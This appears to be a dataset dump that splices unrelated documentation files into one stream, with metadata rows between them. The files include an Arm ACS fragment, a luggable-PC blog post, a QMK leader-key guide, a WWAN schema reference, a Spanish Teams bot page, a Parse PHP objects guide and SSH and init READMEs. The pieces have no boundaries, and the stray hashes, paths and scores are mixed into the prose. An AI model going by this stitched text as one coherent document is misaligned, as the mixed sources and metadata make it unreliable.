Validating the compliance of certain PCIe rules defined in the BSA specification requires the PCIe end-point to generate specific stimulus during the runtime of the test. Examples of such stimulus are P2P, PASID, ATC, etc. The tests that require these stimuli are grouped together in the exerciser module. The exerciser layer is an abstraction layer that enables the integration of hardware capable of generating such stimuli into the test framework. The details of the hardware or Verification IP which enable these exerciser tests are platform specific and beyond the scope of this document.

The Live image does not allow customizations; hence, the exerciser module is not included in the Live image. To enable exerciser tests for greater coverage of PCIe rules, please refer to [BSA](https://github.com/ARM-software/bsa-acs) or contact your Arm representative for details.
## License Arm SystemReady ACS is distributed under Apache v2.0 License. ## Feedback, contributions, and support - For feedback, use the GitHub Issue Tracker that is associated with this repository. - For support, send an email to "[email protected]" with details. - Arm licensees can contact Arm directly through their partner managers. - Arm welcomes code contributions through GitHub pull requests. -------------- *Copyright (c) 2021, Arm Limited and Contributors. All rights reserved.*
77.754717
447
0.796651
eng_Latn
0.990492
53831e35f9faa3fd52280e64a568c39b3241bceb
1,135
md
Markdown
content/project-blog/luggable/index.md
dfirebaugh/dustinfirebaugh.com
44c9ea95b3c4f78b31569de3299920036a1caa00
[ "MIT" ]
null
null
null
content/project-blog/luggable/index.md
dfirebaugh/dustinfirebaugh.com
44c9ea95b3c4f78b31569de3299920036a1caa00
[ "MIT" ]
2
2020-10-14T00:42:34.000Z
2021-11-16T14:45:29.000Z
content/project-blog/luggable/index.md
dfirebaugh/dustinfirebaugh.com
44c9ea95b3c4f78b31569de3299920036a1caa00
[ "MIT" ]
1
2020-10-14T16:48:21.000Z
2020-10-14T16:48:21.000Z
---
path: '/luggable'
date: '2020-01-23'
title: 'Luggable Computer'
tags: ['Luggable Computer', 'computer', 'diy']
excerpt: 'The computer that you can lug-around'
---

![luggable3 pc](./images/luggable3.jpg)

[Luggables](https://en.wikipedia.org/wiki/Portable_computer) are entirely a thing of the past. My current work laptop is thinner than most of my writing utensils. Every once in a while I get a strange urge to put a computer in something. Sometimes you find yourself in [Harbor Freight](https://www.harborfreight.com/), a magical place, and you come across an aisle of cheap yet majestic computer cases. I mean, luggage...

This was a fun project. I 3D printed some small standoffs to hold the micro-ITX motherboard up and cut a few holes in the side of the case. The hard drive was enclosed underneath the motherboard and the power supply was glued down (not proud of this -- haha). There was no elegant solution for storing peripherals (keyboard, mouse, or monitor), but it made for fun hauling around to coffee shops and coworking spaces!

![luggable pc](./images/luggable.jpg)
![luggable2 pc](./images/luggable2.jpg)
54.047619
258
0.760352
eng_Latn
0.996543
538358a6b2a6a6598de2a45592527eb18212284b
4,431
md
Markdown
docs/ja/feature_leader_key.md
fzf/qmk_toolbox
10d6b425bd24b45002555022baf16fb11254118b
[ "MIT" ]
null
null
null
docs/ja/feature_leader_key.md
fzf/qmk_toolbox
10d6b425bd24b45002555022baf16fb11254118b
[ "MIT" ]
null
null
null
docs/ja/feature_leader_key.md
fzf/qmk_toolbox
10d6b425bd24b45002555022baf16fb11254118b
[ "MIT" ]
null
null
null
# The Leader Key: A New Kind of Modifier

<!--- original document: 0.8.134:docs/feature_leader_key.md git diff 0.8.134 HEAD -- docs/feature_leader_key.md | cat -->

If you've ever used Vim, you know what a leader key is. If not, you're about to discover a wonderful concept. :) Instead of hitting Alt+Shift+W (pressing three keys at the same time), what if you could press a _sequence_ of keys instead? You'd press a special modifier (the leader key), followed by W and then C (just a rapid succession of keys), and something would happen.

That's what `KC_LEAD` does. Here's an example:

1. Pick a key on your keyboard that you want to use as the leader key. Assign it the keycode `KC_LEAD`. This key is dedicated to just this purpose -- it's a single-action key and can't be used for anything else.
2. Add the line `#define LEADER_TIMEOUT 300` to your `config.h`. This sets the timeout for the `KC_LEAD` key; specifically, after pressing the `KC_LEAD` key, you only have a certain amount of time to complete the leader key sequence. The `300` here sets it to 300 ms. You can increase this value to give yourself more time to enter the sequence, but any keys pressed during this window are intercepted and not sent, so you may want to keep this value small.
   * By default, this timeout is the time from pressing `KC_LEAD` until the entire sequence is completed. This may be very short for some people, so you may want to increase the timeout. You may also want to enable the `LEADER_PER_KEY_TIMING` option, which resets the timeout each time a key is tapped; this lets you keep the timeout short while still using relatively long sequences. To enable this option, add `#define LEADER_PER_KEY_TIMING` to your `config.h`.
3. Within your `matrix_scan_user` function, add something like this:

```c
LEADER_EXTERNS();

void matrix_scan_user(void) {
  LEADER_DICTIONARY() {
    leading = false;
    leader_end();

    SEQ_ONE_KEY(KC_F) {
      // Anything you can do in a macro.
      SEND_STRING("QMK is awesome.");
    }
    SEQ_TWO_KEYS(KC_D, KC_D) {
      SEND_STRING(SS_LCTL("a") SS_LCTL("c"));
    }
    SEQ_THREE_KEYS(KC_D, KC_D, KC_S) {
      SEND_STRING("https://start.duckduckgo.com\n");
    }
    SEQ_TWO_KEYS(KC_A, KC_S) {
      register_code(KC_LGUI);
      register_code(KC_S);
      unregister_code(KC_S);
      unregister_code(KC_LGUI);
    }
  }
}
```

As you can see, there are a few functions. You can use `SEQ_ONE_KEY` for single-key sequences (the leader followed by just one key), and `SEQ_TWO_KEYS`, `SEQ_THREE_KEYS` through `SEQ_FIVE_KEYS` for longer sequences.

Each of these accepts one or more keycodes as arguments. This is an important point: you can use keycodes from **any layer on your keyboard**. Naturally, that layer must be active for the leader macro to fire.

## Adding Leader Key Support in the `rules.mk`

To add support for the leader key, simply add a single line to your keymap's `rules.mk`:

```make
LEADER_ENABLE = yes
```

## Per-Key Timing on Leader Keys

Rather than relying on an incredibly long timeout for long leader key strings, or for those of us without 200 wpm typing skills, you can enable per-key timing so that each keypress extends the time you have to finish the sequence. This is incredibly helpful when emulating tap dance with the leader key (multiple taps of the same key, like C, C, C).

To enable this, place the following in your `config.h`:

```c
#define LEADER_PER_KEY_TIMING
```

After this, it is recommended to lower `LEADER_TIMEOUT` to something below 300 ms:

```c
#define LEADER_TIMEOUT 250
```

Now, something like the following should be possible without setting the leader key timeout to 1000 ms:

```c
SEQ_THREE_KEYS(KC_C, KC_C, KC_C) {
  SEND_STRING("Per key timing is great!!!");
}
```

## Strict Key Processing

By default, the leader key feature filters the keycodes from the [`Mod-Tap`](ja/mod_tap.md) and [`Layer Tap`](ja/feature_layers.md#switching-and-toggling-layers) features when checking leader sequences. That means that if you use `LT(3, KC_A)`, it is picked up as `KC_A` for the sequence rather than `LT(3, KC_A)`, giving newer users more expected behavior.

While this is fine for most cases, if you want to specify the whole keycode in the sequence (for example, `LT(3, KC_A)` in the example above), you can enable this by adding `#define LEADER_KEY_STRICT_KEY_PROCESSING` to your `config.h` file. This disables the filtering, and you will need to specify the whole keycode.

## Customization

The leader key feature provides a way to customize how it behaves. There are two functions that can be called at certain parts of the process: `leader_start()` and `leader_end()`.

The `leader_start()` function is called when the `KC_LEAD` key is tapped, and the `leader_end()` function is called when either the leader sequence is completed or the leader timeout is reached.

You can add these functions to your code (usually `keymap.c`) to add feedback to leader sequences (such as beeping or playing music).

```c
void leader_start(void) {
  // sequence started
}

void leader_end(void) {
  // sequence ended (no success/failure detection)
}
```

### Example

This example plays the Mario "One Up" sound when you press `KC_LEAD` to start a leader sequence, "All Star" if the sequence completes successfully, and a "Rick Roll" if it fails.
```c
bool did_leader_succeed;
#ifdef AUDIO_ENABLE
// Song arrays carry a _song suffix so they don't collide with the
// leader_start()/leader_end() functions defined below.
float leader_start_song[][2] = SONG(ONE_UP_SOUND);
float leader_succeed_song[][2] = SONG(ALL_STAR);
float leader_fail_song[][2] = SONG(RICK_ROLL);
#endif

LEADER_EXTERNS();

void matrix_scan_user(void) {
  LEADER_DICTIONARY() {
    did_leader_succeed = leading = false;

    SEQ_ONE_KEY(KC_E) {
      // Anything you can do in a macro.
      SEND_STRING(SS_LCTL(SS_LSFT("t")));
      did_leader_succeed = true;
    } else
    SEQ_TWO_KEYS(KC_E, KC_D) {
      SEND_STRING(SS_LGUI("r") "cmd\n" SS_LCTL("c"));
      did_leader_succeed = true;
    }
    leader_end();
  }
}

void leader_start(void) {
#ifdef AUDIO_ENABLE
  PLAY_SONG(leader_start_song);
#endif
}

void leader_end(void) {
  if (did_leader_succeed) {
#ifdef AUDIO_ENABLE
    PLAY_SONG(leader_succeed_song);
#endif
  } else {
#ifdef AUDIO_ENABLE
    PLAY_SONG(leader_fail_song);
#endif
  }
}
```
29.151316
322
0.760099
yue_Hant
0.694899
53835a793ac0642394b8eefd8254e58af5ca81af
2,354
md
Markdown
winrt-related-src/schemas/mobilebroadbandschema/wwan/element-activationmethod.md
huzaifa-d/winrt-related
11c383f23efe346508b2f8adcd1f49530eb7297d
[ "CC-BY-4.0", "MIT" ]
null
null
null
winrt-related-src/schemas/mobilebroadbandschema/wwan/element-activationmethod.md
huzaifa-d/winrt-related
11c383f23efe346508b2f8adcd1f49530eb7297d
[ "CC-BY-4.0", "MIT" ]
null
null
null
winrt-related-src/schemas/mobilebroadbandschema/wwan/element-activationmethod.md
huzaifa-d/winrt-related
11c383f23efe346508b2f8adcd1f49530eb7297d
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
description: Defines the abstract base element for ReconnectToNetwork, ReregisterToNetwork, and ServiceActivation.
Search.Product: eADQiWindows 10XVcnh
title: ActivationMethod
ms.assetid: bd57da53-5b6a-47e7-a240-5e300ad9d133
keywords: windows 10, uwp, schema, mobile broadband schema
ms.topic: reference
ms.date: 04/05/2017
---
# ActivationMethod

Defines the abstract base element for [**ReconnectToNetwork**](element-reconnecttonetwork.md), [**ReregisterToNetwork**](element-reregistertonetwork.md), and [**ServiceActivation**](element-serviceactivation.md).

## Element hierarchy

**&lt;ActivationMethod&gt;**

## Syntax

``` syntax
<ActivationMethod Delay? = P[n]Y[n]M[n]DT[n]H[n]M[n]S duration : "PT0S"
                  RetryCount? = positive integer : "0"
                  RetryInterval? = P[n]Y[n]M[n]DT[n]H[n]M[n]S duration : "PT1M" />
```

### Key

`?` optional (zero or one)
`:` default value

## Attributes and Elements

### Attributes

| Attribute | Description | Data type | Required | Default value |
|-----------|-------------|-----------|----------|---------------|
| **Delay** | Defines the time until the next activation attempt. Duration time format is defined by [ISO 8601](https://www.iso.org/iso/catalogue_detail?csnumber=40874). | P[n]Y[n]M[n]DT[n]H[n]M[n]S duration | No | PT0S |
| **RetryCount** | Defines the number of activation attempts. | positive integer | No | 0 |
| **RetryInterval** | Defines the time between activation attempts. Duration time format is defined by [ISO 8601](https://www.iso.org/iso/catalogue_detail?csnumber=40874). | P[n]Y[n]M[n]DT[n]H[n]M[n]S duration | No | PT1M |

### Child Elements

None.

### Parent Elements

This outermost (document) element may not be contained by any other elements.

## Requirements

| | |
|----------|--------------|
| **Namespace** | `http://www.microsoft.com/networking/CarrierControl/WWAN/v1` |
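Since **ActivationMethod** is abstract, it never appears in a provisioning file by name; you use one of its derived elements instead. A hedged sketch using **ReconnectToNetwork** — the attribute values are illustrative, and it assumes the derived elements accept these inherited attributes:

```xml
<!-- Retry reconnecting up to 3 times, starting after 30 seconds,
     waiting 2 minutes between attempts (ISO 8601 durations). -->
<ReconnectToNetwork Delay="PT30S" RetryCount="3" RetryInterval="PT2M" />
```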
22.634615
212
0.661852
eng_Latn
0.479942
53835bf400c15a864c56b8f6da5877dbdd04a8fa
14,410
md
Markdown
_includes/php/objects.md
Wouter125/docs
71fa7885cf6444b20d82deeaa2e73d046c87350f
[ "BSD-3-Clause" ]
1
2021-03-05T05:12:25.000Z
2021-03-05T05:12:25.000Z
_includes/php/objects.md
Wouter125/docs
71fa7885cf6444b20d82deeaa2e73d046c87350f
[ "BSD-3-Clause" ]
null
null
null
_includes/php/objects.md
Wouter125/docs
71fa7885cf6444b20d82deeaa2e73d046c87350f
[ "BSD-3-Clause" ]
null
null
null
# Objects

## ParseObject

Storing data on Parse is built around the `ParseObject`. Each `ParseObject` contains key-value pairs of JSON-compatible data. This data is schemaless, which means that you don't need to specify ahead of time what keys exist on each `ParseObject`. You simply set whatever key-value pairs you want, and our backend will store it.

For example, let's say you're tracking high scores for a game. A single `ParseObject` could contain:

```php
score: 1337, playerName: "Sean Plott", cheatMode: false
```

Keys must be alphanumeric strings. Values can be strings, numbers, booleans, or even sequential arrays and associative arrays - anything that can be JSON-encoded. Note however that Arrays and Associative Arrays require separate methods to set them on a `ParseObject`.

## Saving Objects

Let's say you want to save the `GameScore` described above to the Parse Cloud. The interface is similar to our other SDKs, including the `save` method:

```php
$gameScore = new ParseObject("GameScore");
$gameScore->set("score", 1337);
$gameScore->set("playerName", "Sean Plott");
$gameScore->set("cheatMode", false);
try {
  $gameScore->save();
  echo 'New object created with objectId: ' . $gameScore->getObjectId();
} catch (ParseException $ex) {
  // Execute any logic that should take place if the save fails.
  // error is a ParseException object with an error code and message.
  echo 'Failed to create new object, with error message: ' . $ex->getMessage();
}
```

After this code runs, you will probably be wondering if anything really happened. To make sure the data was saved, you can look at the Data Browser in your app on Parse. You should see something like this:

```json
objectId: "xWMyZ4YEGZ", score: 1337, playerName: "Sean Plott", cheatMode: false,
createdAt: "2011-06-10T18:33:42Z", updatedAt: "2011-06-10T18:33:42Z"
```

There are two things to note here. You didn't have to configure or set up a new Class called `GameScore` before running this code. Your Parse app lazily creates this Class for you when it first encounters it.

There are also a few fields you don't need to specify that are provided as a convenience. `objectId` is a unique identifier for each saved object. `createdAt` and `updatedAt` represent the time that each object was created and last modified in the cloud. Each of these fields is filled in by Parse, so they don't exist on a `ParseObject` until a save operation has completed.

## Retrieving Objects

Saving data to the cloud is fun, but it's even more fun to get that data out again. If the `ParseObject` has been uploaded to the server, you can retrieve it with its `objectId` using a `ParseQuery`:

```php
$query = new ParseQuery("GameScore");
try {
  $gameScore = $query->get("xWMyZ4YEGZ");
  // The object was retrieved successfully.
} catch (ParseException $ex) {
  // The object was not retrieved successfully.
  // error is a ParseException with an error code and message.
}
```

To get the values out of the `ParseObject`, use the `get` method.
```php
$score = $gameScore->get("score");
$playerName = $gameScore->get("playerName");
$cheatMode = $gameScore->get("cheatMode");
```

The four special values are provided as the result of methods:

```php
$objectId = $gameScore->getObjectId();
$updatedAt = $gameScore->getUpdatedAt();
$createdAt = $gameScore->getCreatedAt();
$acl = $gameScore->getACL();
```

If you need to refresh an object you already have with the latest data that is in the Parse Cloud, you can call the `fetch` method like so:

```php
$gameScore->fetch();
```

If you need to check if an object has been fetched, you can call the `isDataAvailable()` method:

```php
if (!$gameScore->isDataAvailable()) {
  $gameScore->fetch();
}
```

## Updating Objects

Updating an object is simple. Just set some new data on it and call the save method. For example:

```php
// Create the object.
$gameScore = new ParseObject("GameScore");
$gameScore->set("score", 1337);
$gameScore->set("playerName", "Sean Plott");
$gameScore->set("cheatMode", false);
$gameScore->setArray("skills", ["pwnage", "flying"]);
$gameScore->save();

// Now let's update it with some new data. In this case, only cheatMode and score
// will get sent to the cloud. playerName hasn't changed.
$gameScore->set("cheatMode", true);
$gameScore->set("score", 1338);
$gameScore->save();
```

Parse automatically figures out which data has changed, so only "dirty" fields will be sent to the Parse Cloud. You don't need to worry about squashing data that you didn't intend to update.

### Counters

The above example contains a common use case. The "score" field is a counter that we'll need to continually update with the player's latest score. Using the above method works, but it's cumbersome and can lead to problems if you have multiple clients trying to update the same counter.

To help with storing counter-type data, Parse provides methods that atomically increment (or decrement) any number field. So, the same update can be rewritten as:

```php
$gameScore->increment("score");
$gameScore->save();
```

You can also increment by any amount by passing in a second argument to `increment`, for example `$gameScore->increment("score", 10);`. When no amount is specified, 1 is used by default.

### Arrays

To help with storing array data, there are three operations that can be used to atomically change an array associated with a given key:

* `add` appends the given object to the end of an array field.
* `addUnique` adds the given object only if it isn't already contained in an array field. The position of the insert is not guaranteed.
* `remove` removes all instances of the given object from an array field.

For example, we can add items to the set-like "skills" field like so:

```php
$gameScore->addUnique("skills", ["flying"]);
$gameScore->addUnique("skills", ["kungfu"]);
$gameScore->save();
```

Note that it is not currently possible to atomically add and remove items from an array in the same save. You will have to call `save` in between every different kind of array operation.

## Encoding/Decoding

Using version **1.3.0** or later of the PHP SDK gives you the ability to encode/decode instances of `ParseObject`. Encoding an object will give you a JSON-encoded array that can later be decoded to get the original object back, unsaved changes included.

```php
// create an object
$obj = new ParseObject("YourClass");
$obj->set('info', 'an encodable object');

// encode this object
$encoded = $obj->encode();

// save this encoded object somewhere for later use...
// decode to get our object as it was before, // unsaved changes included $decoded = ParseObject::decode($encoded); ``` An object that is encoded can easily be stored away, sent across the wire or even saved as a value under another `ParseObject`. This can be used to create a snapshot of an object at a point in time (unsaved changes included), allowing you to later go back, decode and inspect that object later on. ## Destroying Objects To delete an object from the cloud: ```php $gameScore->destroy(); ``` You can delete a single field from an object with the `delete` method: ```php // After this, the playerName field will be empty $gameScore->delete("playerName"); // Saves the field deletion to the Parse Cloud $gameScore->save(); ``` ## Relational Data Objects may have relationships with other objects. For example, in a blogging application, a `Post` object may have many `Comment` objects. Parse supports all kind of relationships, including one-to-one, one-to-many, and many-to-many. ### One-to-One and One-to-Many Relationships One-to-one and one-to-many relationships are modeled by saving a `ParseObject` as a value in the other object. For example, each `Comment` in a blogging app might correspond to one `Post`. To create a new `Post` with a single `Comment`, you could write: ```php // Create the post $myPost = new ParseObject("Post"); $myPost->set("title", "I'm Hungry"); $myPost->set("content", "Where should we go for lunch?"); // Create the comment $myComment = new ParseObject("Comment"); $myComment->set("content", "Let's do Sushirrito."); // Add the post as a value in the comment $myComment->set("parent", $myPost); // This will save both myPost and myComment $myComment->save(); ``` Internally, the Parse framework will store the referred-to object in just one place, to maintain consistency. You can also link objects using just their `objectId`s like so: ```php $post = new ParseObject("Post", "1zEcyElZ80"); $myComment->set("parent", $post); ``` By default, when fetching an object, related `ParseObject`s are not fetched. These objects' values cannot be retrieved until they have been fetched like so: ```php $post = $fetchedComment->get("parent"); $post->fetch(); $title = $post->get("title"); ``` ### Many-to-Many Relationships Many-to-many relationships are modeled using `ParseRelation`. This works similar to storing an array of `ParseObject`s in a key, except that you don't need to fetch all of the objects in a relation at once. In addition, this allows `ParseRelation` to scale to many more objects than the array of `ParseObject` approach. For example, a `User` may have many `Posts` that she might like. In this case, you can store the set of `Posts` that a `User` likes using `relation`. In order to add a `Post` to the "likes" array of the `User`, you can do: ```php $user = ParseUser::getCurrentUser(); $relation = $user->getRelation("likes"); $relation->add($post); $user->save(); ``` You can remove a post from a `ParseRelation`: ```php $relation->remove($post); $user->save(); ``` You can call `add` and `remove` multiple times before calling save: ```php $relation->remove($post1); $relation->remove($post2); $user->save(); ``` You can also pass in an array of `ParseObject` to `add` and `remove`: ```php $relation->add([$post1, $post2, $post3]); $user->save(); ``` By default, the array of objects in this relation are not downloaded. You can get an array of the posts that a user likes by using the `ParseQuery` returned by `getQuery`. 
The code looks like:

```php
$postsLiked = $relation->getQuery()->find();
// $postsLiked contains the posts that the current user likes.
```

If you want only a subset of the Posts, you can add extra constraints to the `ParseQuery` returned by `getQuery` like this:

```php
$query = $relation->getQuery();
$query->equalTo("title", "I'm Hungry");
$postsLiked = $query->find();
// $postsLiked contains posts liked by the current user which have the title "I'm Hungry".
```

For more details on `ParseQuery`, please look at the query portion of this guide. A `ParseRelation` behaves similarly to an array of `ParseObject` for querying purposes, so any query you can do on an array of objects, you can do on a `ParseRelation`.

## Data Types

So far we've used values with type `String`, `Integer`, and `ParseObject`. Parse also supports PHP `DateTime`s and `null`. You can nest PHP arrays and associative arrays (JSON Objects) to store more structured data within a single `ParseObject`. Overall, the following types are allowed for each field in your object:

* String => `String`
* Number => `Integer` and `float`
* Bool => `Boolean`
* Array => PHP arrays
* Object => associative arrays (JSON Objects)
* Date => `DateTime`
* File => `ParseFile`
* Pointer => other `ParseObject`
* Relation => `ParseRelation`
* GeoPoint => `ParseGeoPoint`
* Null => `null`

Some examples:

```php
$number = 42;
$string = "the number is " . $number;
$date = new DateTime();
$array = [$string, $number];
$object = ["number" => $number, "string" => $string];
$geoPoint = new ParseGeoPoint(37.75, -122.68); // san fran

$bigObject = new ParseObject("BigObject");
$bigObject->set("myNumber", $number);
$bigObject->set("myString", $string);
$bigObject->set("myDate", $date);
$bigObject->setArray("myArray", $array);
$bigObject->setAssociativeArray("myObject", $object);
$bigObject->set("myGeoPoint", $geoPoint);
$bigObject->set("anyKey", null); // this value can only be saved to an existing key
$bigObject->save();
```

We do not recommend storing large pieces of binary data like images or documents on `ParseObject`. `ParseObject`s should not exceed 128 kilobytes in size. We recommend you use `ParseFile`s to store images, documents, and other types of files. You can do so by instantiating a `ParseFile` object and setting it on a field. See [Files](#files) for more details.

For more information about how Parse handles data, check out our documentation on [Data](#data).

## Subclassing ParseObject

Each `ParseObject` is an instance of a specific subclass with a class name that you can use to distinguish different sorts of data. For example, we could call the high score object a `GameScore`. We recommend that you NameYourClassesLikeThis and nameYourKeysLikeThis, just to keep your code looking pretty.

To create a new subclass, create a new class which extends the `ParseObject` class, add the `$parseClassName` static property, and call the `registerSubclass` method before use. Any `ParseQuery` will return instances of the new class for any `ParseObject` with the same class name.

```php
class GameScore extends ParseObject
{
  public static $parseClassName = "GameScore";
}
```

```php
// Do this once, at the start of your app, before ParseClient::initialize(...);
GameScore::registerSubclass();

// Create a new instance of that class.
$gameScore = new GameScore();
```

You can add additional methods and properties to your subclasses of `ParseObject`.
```php
// A complex subclass of ParseObject
class Monster extends ParseObject
{
  public static $parseClassName = "Monster";

  public function hasSuperHumanStrength() {
    return $this->get("strength") > 18;
  }

  public static function spawn($strength) {
    $monster = new Monster();
    $monster->set("strength", $strength);
    return $monster;
  }
}
```

```php
$monster = Monster::spawn(200);
echo $monster->get("strength");         // Displays 200.
echo $monster->hasSuperHumanStrength(); // Displays 1 (true).
```

If you want to override the `__construct` method, make sure its first three parameters are exactly the same as the parent `ParseObject` constructor:

```php
class GameScore extends ParseObject
{
  public static $parseClassName = "GameScore";

  public function __construct($className = null, $objectId = null, $isPointer = false, $another_param = null) {
    parent::__construct("GameScore", $objectId, $isPointer);
    // ...
  }
}
```
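As a minimal sketch of how subclassing and querying fit together (it assumes `Monster::registerSubclass()` runs at app startup, as described above, and the query constraint is illustrative rather than prescribed):

```php
// Register the subclass once, before any queries run.
Monster::registerSubclass();

// Queries on the "Monster" class now return Monster instances,
// so the helper defined above is available on each result.
$query = new ParseQuery("Monster");
$query->greaterThan("strength", 18);
$results = $query->find();

foreach ($results as $monster) {
    // $monster is a Monster, not a plain ParseObject
    echo $monster->hasSuperHumanStrength(); // Displays 1 (true) for each match.
}
```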
37.428571
545
0.729146
eng_Latn
0.991769
53836407344f44ea2411dd857d20af8356338a9a
104
md
Markdown
README.md
Aevit/SCScreenshot
23d11a08bed7cf549d0d53f24b5e96f573145df8
[ "MIT" ]
2
2016-07-03T15:48:09.000Z
2017-02-17T08:42:09.000Z
README.md
Aevit/SCScreenshot
23d11a08bed7cf549d0d53f24b5e96f573145df8
[ "MIT" ]
null
null
null
README.md
Aevit/SCScreenshot
23d11a08bed7cf549d0d53f24b5e96f573145df8
[ "MIT" ]
null
null
null
# SCScreenshot find all the screenshots in the album and put them into a new album called "screenshots"
34.666667
88
0.798077
eng_Latn
0.999537
5383dff397b5b0030b39a7c7131135d7630ba9d2
582
md
Markdown
ssh-access-and-policy.md
Rajpratik71/diego-design-notes
cf628cede60ae46fbaf371db38ed1ea25914f045
[ "Apache-2.0" ]
70
2015-01-22T16:23:26.000Z
2016-05-27T03:42:35.000Z
ssh-access-and-policy.md
Rajpratik71/diego-design-notes
cf628cede60ae46fbaf371db38ed1ea25914f045
[ "Apache-2.0" ]
20
2015-01-08T17:51:23.000Z
2016-03-29T07:35:22.000Z
ssh-access-and-policy.md
isabella232/diego-design-notes
cf36be42163fdd2c6c25995e16c8b03e0fbc0ab1
[ "Apache-2.0" ]
41
2015-01-08T10:15:14.000Z
2016-05-18T02:34:06.000Z
# SSH Access and Policy

Up-to-date documentation about the SSH features of Diego can be found in the CF Documentation:

- Developers accessing their applications and service instances over SSH should consult "[Accessing Apps with SSH](http://docs.cloudfoundry.org/devguide/deploy-apps/ssh-apps.html)" and "[Accessing Services with SSH](http://docs.cloudfoundry.org/devguide/deploy-apps/ssh-services.html)".
- Operators configuring SSH access in their CF and Diego deployment manifests should consult "[Configuring SSH Access](http://docs.cloudfoundry.org/running/config-ssh.html)".
83.142857
285
0.798969
eng_Latn
0.700575
538470cf8cb6f15949eafb604306cf99d537c177
4,329
md
Markdown
msteams-platform/resources/bot-v3/bots-with-tabs.md
isabella232/msteams-docs.es-ES
a5abd8a27d657bc325eb3f5e19e2ff0d1059f235
[ "CC-BY-4.0", "MIT" ]
null
null
null
msteams-platform/resources/bot-v3/bots-with-tabs.md
isabella232/msteams-docs.es-ES
a5abd8a27d657bc325eb3f5e19e2ff0d1059f235
[ "CC-BY-4.0", "MIT" ]
1
2021-02-23T19:09:10.000Z
2021-02-23T19:09:10.000Z
msteams-platform/resources/bot-v3/bots-with-tabs.md
isabella232/msteams-docs.es-ES
a5abd8a27d657bc325eb3f5e19e2ff0d1059f235
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Combinar bots con pestañas description: Describe cómo usar fichas y bots juntos keywords: desarrollo de pestañas de Microsoft Teams ms.date: 03/15/2018 ms.openlocfilehash: 59ae8bc01f82c70dd7ea6869cb870e26acae1293 ms.sourcegitcommit: 4329a94918263c85d6c65ff401f571556b80307b ms.translationtype: MT ms.contentlocale: es-ES ms.lasthandoff: 02/01/2020 ms.locfileid: "41676005" --- # <a name="combine-bots-with-tabs"></a>Combinar bots con pestañas [!include[v3-to-v4-SDK-pointer](~/includes/v3-to-v4-pointer-bots.md)] Los bots y las pestañas funcionan bien juntos y, a menudo, se combinan en un único servicio back-end. En esta sección se describen los procedimientos recomendados y los patrones comunes para usar fichas y bots juntos. ## <a name="associating-user-identities-across-bot-and-tab"></a>Asociación de identidades de usuario en el bot y la ficha Por ejemplo: Supongamos que la aplicación de pestaña usa un sistema de identificación de propietario para proteger su contenido. Supongamos que también tiene un bot que puede interactuar con el usuario. Normalmente, querrá Mostrar contenido en la pestaña que es específico del usuario de visualización. El desafío es que el identificador de usuario del sistema es probablemente diferente del identificador de usuario de Microsoft Teams. ¿Cómo se asocian estas dos identidades? En general, el enfoque recomendado es iniciar sesión del usuario con el bot usando el mismo sistema de identidad usado para proporcionar autenticación para el contenido de la pestaña. Puede implementar esto mediante la acción de inicio de sesión, que normalmente se registra en el usuario a través de un flujo de OAuth. Este flujo funciona mejor si el proveedor de identidades implementa el protocolo OAuth 2,0. A continuación, puede asociar el identificador de usuario de Teams a las credenciales del usuario desde su propio servicio de identidad. ![Asociar identidades](~/assets/images/bots/associating_contexts.png) ## <a name="constructing-deep-links-to-tabs-in-messages-from-your-bot"></a>Creación de vínculos profundos a pestañas en los mensajes de su bot Es posible que desee usar pestañas para mostrar más contenido del que cabe dentro de una tarjeta o proporcionar una forma de completar tareas complejas de rellenado de formularios mediante el lienzo de tabulación. Por ejemplo, considere la posibilidad de navegar por el usuario a la pestaña cuando haga clic en la tarjeta de su bot. Para que esto suceda, deberá codificar el mensaje del bot para incluir una dirección URL de [vínculo profundo](~/concepts/build-and-test/deep-links.md) , ya sea mediante marcado o como destino de la acción openUrl. Los vínculos profundos dependen de una entityId, que es un valor opaco que se asigna a una entidad única en el sistema. Cuando se crea la pestaña, lo ideal es almacenar un estado sencillo (por ejemplo, indicador) en el back-end en el que se indica que la pestaña se ha creado en el canal. Cuando el bot construye un mensaje, puede dirigirse al entityId asociado a esa ficha. **Nota:** en chats personales, dado que las pestañas son "estáticas" y se instalan con la aplicación, siempre puede suponer que existe y, por lo tanto, crear vínculos profundos en consecuencia. ## <a name="sending-notifications-for-tab-updates"></a>Envío de notificaciones de actualizaciones de pestañas A menudo, deseará notificar al usuario final siempre que se produzca una actualización o una acción del usuario en una pestaña. 
Un escenario de ejemplo consiste en asignar una tarea o un tíquet a un compañero integrante del equipo y, a continuación, notificar a ese miembro del equipo.

Hay dos formas de lograr este escenario:

1. Si desea notificar a todo el canal, su bot puede enviar un mensaje al canal de forma asincrónica. No hay forma de que un bot cree proactivamente la conversación de pestaña si no se creó con la ficha.
2. Si sólo desea notificar al destinatario o a las partes interesadas implicadas en la acción, el bot puede enviar un mensaje de chat personal al usuario. Primero debe comprobar si existe una conversación personal entre su bot y el usuario. Si no es así, puede llamar a `CreateConversation` para iniciar el chat personal.

En ambos casos, use las notificaciones de eventos de manera inteligente y nunca sature al usuario con actualizaciones innecesarias.
92.106383
547
0.804343
spa_Latn
0.996292
5384725664508f0062547827943a168e5d60b61c
291
md
Markdown
contrib/init/README.md
Simple-Software-Solutions/RBX-Core
8cf0dfda708233e080e8729cec0b5014218386e3
[ "MIT" ]
null
null
null
contrib/init/README.md
Simple-Software-Solutions/RBX-Core
8cf0dfda708233e080e8729cec0b5014218386e3
[ "MIT" ]
null
null
null
contrib/init/README.md
Simple-Software-Solutions/RBX-Core
8cf0dfda708233e080e8729cec0b5014218386e3
[ "MIT" ]
null
null
null
Sample configuration files for: ``` SystemD: rbxd.service Upstart: rbxd.conf OpenRC: rbxd.openrc rbxd.openrcconf CentOS: rbxd.init macOS: org.rbx.rbxd.plist ``` have been made available to assist packagers in creating node packages here. See doc/init.md for more information.
22.384615
76
0.749141
eng_Latn
0.859018
5384c624b73add81fa14be04a1561908f45c273f
178
md
Markdown
languages/common-lisp/bin/generate-scaffolding/template/.docs/introduction.md
AlexLeSang/v3
3d35961a961b5a2129b1d42f1d118972d9665357
[ "MIT" ]
3
2020-07-25T06:24:00.000Z
2020-09-14T17:39:11.000Z
languages/common-lisp/bin/generate-scaffolding/template/.docs/introduction.md
AlexLeSang/v3
3d35961a961b5a2129b1d42f1d118972d9665357
[ "MIT" ]
1
2020-01-26T20:08:06.000Z
2020-01-26T20:08:06.000Z
languages/common-lisp/bin/generate-scaffolding/template/.docs/introduction.md
AlexLeSang/v3
